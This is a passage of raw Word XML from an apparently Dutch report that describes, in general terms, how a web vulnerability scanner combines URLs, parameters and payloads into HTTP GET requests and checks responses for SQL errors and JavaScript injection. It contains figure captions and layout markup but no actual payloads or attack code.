                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="15604D23" w14:textId="034FB578" w:rsidR="00CE4BB5" w:rsidRPr="008353AB" w:rsidRDefault="00CE4BB5" w:rsidP="00363BBF">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.15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117BC" id="Text Box 223" o:spid="_x0000_s1096" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:68.8pt;margin-top:20.05pt;width:289.05pt;height:21.25pt;z-index:25197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2d8ToCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF+cDzRtjThFliLDgKAt&#10;kAw9K7IcC5BETVJiZ79+lGynW7fTsItCkdSj+R6ZxUOrFTkL5yWYgk5GY0qE4VBKcyzot/3m0x0l&#10;PjBTMgVGFPQiPH1YfvywaGwuplCDKoUjCGJ83tiC1iHYPMs8r4VmfgRWGAxW4DQLeHXHrHSsQXSt&#10;sul4PM8acKV1wIX36H3sgnSZ8KtK8PBcVV4EogqK3xbS6dJ5iGe2XLD86JitJe8/g/3DV2gmDRa9&#10;Qj2ywMjJyT+gtOQOPFRhxEFnUFWSi9QDdjMZv+tmVzMrUi9IjrdXmvz/g+VP5xdHZFnQ6XRGiWEa&#10;RdqLNpDP0JLoQ4Ya63NM3FlMDS0GUOnB79EZG28rp+MvtkQwjlxfrvxGOI7O2fx2fD+7oYRjbDq/&#10;v7u9iTDZ22vrfPgiQJNoFNShfolWdt760KUOKbGYByXLjVQqXmJgrRw5M9S6qWUQPfhvWcrEXAPx&#10;VQfYeUQalr5KbLhrLFqhPbSJovmVjQOUFyTDQTdQ3vKNxPJb5sMLczhB2D9uRXjGo1LQFBR6i5Ia&#10;3I+/+WM+CotRShqcyIL67yfmBCXqq0HJ4/gOhhuMw2CYk14DNj7BfbM8mfjABTWYlQP9isuyilUw&#10;xAzHWgUNg7kO3V7gsnGxWqUkHFLLwtbsLI/QA8379pU524sUUN4nGGaV5e+06nKTWnZ1Ckh8EjIS&#10;27GIAxAvOOBpFPpljBv06z1lvf1lLH8CAAD//wMAUEsDBBQABgAIAAAAIQBsGtG44AAAAAkBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI8xT8MwEIV3JP6DdUgsiDppQ1KFOFVVwQBLRejC5sbXOBDbke20&#10;4d9zTDA+3af3vqs2sxnYGX3onRWQLhJgaFunetsJOLw/36+BhSitkoOzKOAbA2zq66tKlspd7Bue&#10;m9gxKrGhlAJ0jGPJeWg1GhkWbkRLt5PzRkaKvuPKywuVm4EvkyTnRvaWFrQccaex/WomI2Cffez1&#10;3XR6et1mK/9ymHb5Z9cIcXszbx+BRZzjHwy/+qQONTkd3WRVYAPlVZETKiBLUmAEFOlDAewoYL3M&#10;gdcV//9B/QMAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQD8HZ3xOgIAAHoEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBsGtG44AAAAAkBAAAPAAAA&#10;AAAAAAAAAAAAAJIEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="15604D23" w14:textId="034FB578" w:rsidR="00CE4BB5" w:rsidRPr="008353AB" w:rsidRDefault="00CE4BB5" w:rsidP="00363BBF">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.15</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F399FC" w14:textId="77777777" w:rsidR="005E14FF" w:rsidRDefault="005E14FF" w:rsidP="008A0AB0"/>
    <w:p w14:paraId="7DD4C60A" w14:textId="77777777" w:rsidR="008A0AB0" w:rsidRDefault="008A0AB0" w:rsidP="008A0AB0">
      <w:r>
        <w:t>De twee waardes staan in de Database los van elkaar maar worden door het Scanner component aan elkaar gekoppeld. Het koppelen gebeurt wanneer de Scanner in de voorbereidende fase zich klaar maakt voor de gesimuleerde aanvallen. In figuur 4.15 wordt er een voorbeeld gegeven van het combineerproces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF8A38D" w14:textId="6782F648" w:rsidR="0009015C" w:rsidRDefault="00D90771" w:rsidP="008571B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251998208" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="262F16E7" wp14:editId="778E6139">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1905</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4646295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2561590" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="229" name="Text Box 229"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2561590" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="1178EF59" w14:textId="043FF34C" w:rsidR="00CE4BB5" w:rsidRPr="002268F1" w:rsidRDefault="00CE4BB5" w:rsidP="00D90771">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.16 vergrote versie in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2F16E7" id="Text Box 229" o:spid="_x0000_s1097" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.15pt;margin-top:365.85pt;width:201.7pt;height:21.25pt;z-index:25199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5buYzkCAAB6BAAADgAAAGRycy9lMm9Eb2MueG1srFTBjtowEL1X6j9YvpdAVOgSEVaUFVUltLsS&#10;VHs2jkMs2R7XNiT06zt2CNtue6p6MeOZ8Zu8NzMs7jutyFk4L8GUdDIaUyIMh0qaY0m/7Tcf7ijx&#10;gZmKKTCipBfh6f3y/btFawuRQwOqEo4giPFFa0vahGCLLPO8EZr5EVhhMFiD0yzg1R2zyrEW0bXK&#10;8vF4lrXgKuuAC+/R+9AH6TLh17Xg4amuvQhElRS/LaTTpfMQz2y5YMXRMdtIfv0M9g9foZk0WPQG&#10;9cACIycn/4DSkjvwUIcRB51BXUsuEgdkMxm/YbNrmBWJC4rj7U0m//9g+eP52RFZlTTP55QYprFJ&#10;e9EF8hk6En2oUGt9gYk7i6mhwwB2evB7dEbiXe10/EVKBOOo9eWmb4Tj6Myns8l0jiGOsXw2v/s0&#10;jTDZ62vrfPgiQJNolNRh/5Ks7Lz1oU8dUmIxD0pWG6lUvMTAWjlyZtjrtpFBXMF/y1Im5hqIr3rA&#10;3iPSsFyrRMI9sWiF7tAliWYfB9YHqC4ohoN+oLzlG4nlt8yHZ+ZwgpAkbkV4wqNW0JYUrhYlDbgf&#10;f/PHfGwsRilpcSJL6r+fmBOUqK8GWx7HdzDcYBwGw5z0GpD4BPfN8mTiAxfUYNYO9AsuyypWwRAz&#10;HGuVNAzmOvR7gcvGxWqVknBILQtbs7M8Qg8y77sX5uy1SQHb+wjDrLLiTa/63NQtuzoFFD41Mgrb&#10;q4gDEC844GkUrssYN+jXe8p6/ctY/gQAAP//AwBQSwMEFAAGAAgAAAAhAFyu2ELfAAAACAEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMjzFPwzAQhXck/oN1SCyIOm2iBoU4VVXBAEtF6MLmxtc4EJ+j2GnD&#10;v+eYYLu79/Tue+Vmdr044xg6TwqWiwQEUuNNR62Cw/vz/QOIEDUZ3XtCBd8YYFNdX5W6MP5Cb3iu&#10;Yys4hEKhFdgYh0LK0Fh0Oiz8gMTayY9OR17HVppRXzjc9XKVJGvpdEf8weoBdxabr3pyCvbZx97e&#10;Taen122Wji+Habf+bGulbm/m7SOIiHP8M8MvPqNDxUxHP5EJoleQsk9Bni5zECxnScrDkS95tgJZ&#10;lfJ/geoHAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAM5buYzkCAAB6BAAADgAAAAAAAAAA&#10;AAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAXK7YQt8AAAAIAQAADwAAAAAA&#10;AAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAJ0FAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1178EF59" w14:textId="043FF34C" w:rsidR="00CE4BB5" w:rsidRPr="002268F1" w:rsidRDefault="00CE4BB5" w:rsidP="00D90771">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.16 vergrote versie in Bijlage B</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251996160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2CA919BB" wp14:editId="2A8713B0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2561590" cy="4587240"/>
            <wp:effectExtent l="0" t="0" r="3810" b="10160"/>
            <wp:wrapSquare wrapText="bothSides"/>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roces combining links and parameters.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561590" cy="4587240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="001B6646">
        <w:t xml:space="preserve">In dit proces worden twee collecties uit de database gehaald </w:t>
      </w:r>
      <w:r w:rsidR="009317AB">
        <w:t xml:space="preserve">de URL’s en </w:t>
      </w:r>
      <w:r w:rsidR="00017AA9">
        <w:t xml:space="preserve">Parameters. Uit ieder collectie worden twee </w:t>
      </w:r>
      <w:r w:rsidR="00C01137">
        <w:t xml:space="preserve">items gehaald, deze worden meegegeven aan de functie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00224566">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>combineerProces</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C01137">
        <w:t xml:space="preserve">, deze </w:t>
      </w:r>
      <w:r w:rsidR="00405C01">
        <w:t xml:space="preserve">combineert de twee waardes aan elkaar om uiteindelijk een samenstelling van URL en Parameter te krijgen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EF867C" w14:textId="36C8A0F1" w:rsidR="007D5162" w:rsidRDefault="004E77D4" w:rsidP="008571B9">
      <w:r>
        <w:t>Na het combineerproces wordt er een Collectie gemaakt van de samengestelde links. Dit wordt gedaan ter voorbereiding van het volgende</w:t>
      </w:r>
      <w:r w:rsidR="0086604D">
        <w:t xml:space="preserve"> sub </w:t>
      </w:r>
      <w:r>
        <w:t>proces, het toevoegen van de pay</w:t>
      </w:r>
      <w:r w:rsidR="008834C2">
        <w:t>load aan de samengestelde URL’s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D6456" w14:textId="77777777" w:rsidR="00E56978" w:rsidRDefault="00E56978" w:rsidP="008571B9"/>
    <w:p w14:paraId="01E9F66E" w14:textId="77777777" w:rsidR="006E49A1" w:rsidRDefault="006E49A1" w:rsidP="008571B9"/>
    <w:p w14:paraId="0FF9226B" w14:textId="11F50C7A" w:rsidR="00C533F9" w:rsidRDefault="00C533F9" w:rsidP="008571B9"/>
    <w:p w14:paraId="27F196A8" w14:textId="77777777" w:rsidR="0032723F" w:rsidRDefault="0032723F" w:rsidP="008571B9"/>
    <w:p w14:paraId="49959CC2" w14:textId="77777777" w:rsidR="00D71FEF" w:rsidRDefault="00D71FEF" w:rsidP="008571B9"/>
    <w:p w14:paraId="0BABAD13" w14:textId="77777777" w:rsidR="00D71FEF" w:rsidRDefault="00D71FEF" w:rsidP="008571B9"/>
    <w:p w14:paraId="7A2D7402" w14:textId="474EFB7C" w:rsidR="0032723F" w:rsidRDefault="0032723F" w:rsidP="008571B9"/>
    <w:p w14:paraId="3CC86DC8" w14:textId="44B9F42F" w:rsidR="0032723F" w:rsidRDefault="0032723F" w:rsidP="008571B9"/>
    <w:p w14:paraId="28ACC0A9" w14:textId="5AE2D768" w:rsidR="00BB04CC" w:rsidRDefault="00BB04CC" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0074C1" w14:textId="77777777" w:rsidR="00D90771" w:rsidRDefault="00D90771" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DC272C6" w14:textId="3C20064C" w:rsidR="00B13567" w:rsidRDefault="008B085B" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B085B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Aanval proces</w:t>
      </w:r>
      <w:r w:rsidR="0091321A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> – stap 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE11D2" w14:textId="137B59EF" w:rsidR="00445763" w:rsidRDefault="00930DB8" w:rsidP="008571B9">
      <w:r>
        <w:t xml:space="preserve">Tijdens het aanval proces worden </w:t>
      </w:r>
      <w:r w:rsidR="00A84FE0">
        <w:t>alle samengestelde URL’s (stap 1)</w:t>
      </w:r>
      <w:r w:rsidR="00155515">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00A84FE0">
        <w:t>geïndexeerde</w:t>
      </w:r>
      <w:r w:rsidR="00155515">
        <w:t xml:space="preserve"> Collectie gezet </w:t>
      </w:r>
      <w:r w:rsidR="00A84FE0">
        <w:t xml:space="preserve">en </w:t>
      </w:r>
      <w:r w:rsidR="00310442">
        <w:t>klaar</w:t>
      </w:r>
      <w:r w:rsidR="008012D8">
        <w:t xml:space="preserve">gezet voor de gesimuleerde HTTP GET </w:t>
      </w:r>
      <w:r w:rsidR="00AF7F06">
        <w:t>aanvallen.</w:t>
      </w:r>
      <w:r w:rsidR="00155515">
        <w:t xml:space="preserve"> I</w:t>
      </w:r>
      <w:r w:rsidR="00623C95">
        <w:t xml:space="preserve">eder URL van de Collectie wordt uitgevoerd met een HTTP GET Request </w:t>
      </w:r>
      <w:r w:rsidR="003B1934">
        <w:t xml:space="preserve">om een </w:t>
      </w:r>
      <w:r w:rsidR="00C45345">
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="003B1934">
        <w:t xml:space="preserve">Response (Reactie) van de server terug te krijgen. In deze Response zit de broncode van de HTML in. </w:t>
      </w:r>
      <w:r w:rsidR="00C45345">
        <w:t>Het is de HTTP Response die de Scanner analyseert.</w:t>
      </w:r>
      <w:r w:rsidR="00186ADC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3065EE93" w14:textId="6FAF75BC" w:rsidR="000B41EF" w:rsidRPr="000B41EF" w:rsidRDefault="000B41EF" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B41EF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Formule</w:t>
      </w:r>
      <w:r w:rsidR="006C14E4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTP = URL X Payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021F0C33" w14:textId="6D19B9A1" w:rsidR="00C004C8" w:rsidRDefault="007F4D3A" w:rsidP="008571B9">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251992064" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="327635F0" wp14:editId="03B62AF1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5324475</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1771650</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="699135" cy="218440"/>
                <wp:effectExtent l="0" t="0" r="12065" b="10160"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="20093"/>
                    <wp:lineTo x="21188" y="20093"/>
                    <wp:lineTo x="21188" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="235" name="Text Box 235"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="699135" cy="218440"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0AF33F6C" w14:textId="7EFCCB09" w:rsidR="00CE4BB5" w:rsidRPr="006B08C3" w:rsidRDefault="00CE4BB5" w:rsidP="007077C9">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.17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635F0" id="Text Box 235" o:spid="_x0000_s1098" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:419.25pt;margin-top:139.5pt;width:55.05pt;height:17.2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16rszkCAAB5BAAADgAAAGRycy9lMm9Eb2MueG1srFTfb9owEH6ftP/B8vsIsA61EaFiVEyTUFsJ&#10;pj4bxyaWbJ9nGxL21+/sELp1e5r24pzvzvfj++4yv++MJifhgwJb0cloTImwHGplDxX9tlt/uKUk&#10;RGZrpsGKip5FoPeL9+/mrSvFFBrQtfAEg9hQtq6iTYyuLIrAG2FYGIETFo0SvGERr/5Q1J61GN3o&#10;Yjoez4oWfO08cBECah96I13k+FIKHp+kDCISXVGsLebT53OfzmIxZ+XBM9cofimD/UMVhimLSa+h&#10;Hlhk5OjVH6GM4h4CyDjiYAqQUnGRe8BuJuM33Wwb5kTuBcEJ7gpT+H9h+ePp2RNVV3T68RMllhkk&#10;aSe6SD5DR5IOEWpdKNFx69A1dmhApgd9QGVqvJPepC+2RNCOWJ+v+KZwHJWzu7tJysLRNJ3c3txk&#10;/IvXx86H+EWAIUmoqEf6MqrstAkRC0HXwSXlCqBVvVZap0syrLQnJ4ZUt42KIpWIL37z0jb5Wkiv&#10;enOvEXlWLllSv31fSYrdvssIza5g7KE+IxYe+nkKjq8Vpt+wEJ+ZxwHC9nEp4hMeUkNbUbhIlDTg&#10;f/xNn/yRV7RS0uJAVjR8PzIvKNFfLTKepncQ/CDsB8EezQqw8Qmum+NZxAc+6kGUHswL7soyZUET&#10;sxxzVTQO4ir2a4G7xsVymZ1wRh2LG7t1PIUeYN51L8y7C0kR2X2EYVRZ+Yar3rcHfXmMIFUmMgHb&#10;o4gcpQvOd2brsotpgX69Z6/XP8biJwAAAP//AwBQSwMEFAAGAAgAAAAhAOwxBgviAAAACwEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SFwq6jQpIQ1xKmjhBoeWqudtbJKIeB3ZTpP+&#10;PeZUjqt9mnlTrCfdsbOyrjUkYDGPgCmqjGypFnD4en/IgDmPJLEzpARclIN1eXtTYC7NSDt13vua&#10;hRByOQpovO9zzl3VKI1ubnpF4fdtrEYfTltzaXEM4brjcRSlXGNLoaHBXm0aVf3sBy0g3dph3NFm&#10;tj28feBnX8fH18tRiPu76eUZmFeTv8Lwpx/UoQxOJzOQdKwTkCXZY0AFxE+rMCoQq2WWAjsJSBbJ&#10;EnhZ8P8byl8AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAi16rszkCAAB5BAAADgAAAAAA&#10;AAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA7DEGC+IAAAALAQAADwAA&#10;AAAAAAAAAAAAAACRBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0AF33F6C" w14:textId="7EFCCB09" w:rsidR="00CE4BB5" w:rsidRPr="006B08C3" w:rsidRDefault="00CE4BB5" w:rsidP="007077C9">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.17</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251990016" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="46E2F840" wp14:editId="1C8241B3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>563880</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>395605</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4602480" cy="1602740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>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aanvalproces.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4602480" cy="1602740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0059311B">
        <w:t>De Scanner voert (Aantal HTTP Request = URL’s X Payloads)</w:t>
      </w:r>
      <w:r w:rsidR="00246F55">
        <w:t xml:space="preserve"> uit</w:t>
      </w:r>
      <w:r w:rsidR="00B81EF5">
        <w:t>. Als er 10 URL’s zijn en 100 payloads dan worden er 1000 HTTP Request.</w:t>
      </w:r>
      <w:r w:rsidR="0059311B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C1185F" w14:textId="200E132A" w:rsidR="00773100" w:rsidRDefault="00773100" w:rsidP="008571B9"/>
    <w:p w14:paraId="3B9E37E3" w14:textId="3699ED79" w:rsidR="000D13DD" w:rsidRDefault="00D9539C" w:rsidP="008571B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analyse</w:t>
      </w:r>
      <w:r w:rsidR="00445763">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>proces – stap 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5367B76B" w14:textId="68DF6699" w:rsidR="001E48F1" w:rsidRDefault="00AE247F" w:rsidP="008571B9">
      <w:r>
        <w:t>In dit laatste proces</w:t>
      </w:r>
      <w:r w:rsidR="00FE50C7">
        <w:t xml:space="preserve"> wordt er gescand op </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FE50C7">
        <w:t>SQL database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FE50C7">
        <w:t xml:space="preserve"> errors en javascript injectie om zo te bepalen op welke HTML pagina’s er kwetsbaarheden geïdentificeerd zijn. </w:t>
      </w:r>
      <w:r w:rsidR="00297273">
        <w:t xml:space="preserve">Zodra er een kwetsbaarheid op </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00297273">
        <w:t>één</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00297273">
        <w:t xml:space="preserve"> van de</w:t>
      </w:r>
      <w:r w:rsidR="001B7FF9">
        <w:t xml:space="preserve"> HT</w:t>
      </w:r>
      <w:r w:rsidR="000656FE">
        <w:t>ML pagina g</w:t>
      </w:r>
      <w:r w:rsidR="00297273">
        <w:t xml:space="preserve">evonden is wordt het </w:t>
      </w:r>
      <w:r w:rsidR="009533B7">
        <w:t>opgeslagen</w:t>
      </w:r>
      <w:r w:rsidR="00781690">
        <w:t xml:space="preserve"> als een record in de database. </w:t>
      </w:r>
      <w:r w:rsidR="00D568B6">
        <w:t>Zo verzameld de Scanner de geïdentificeer</w:t>
      </w:r>
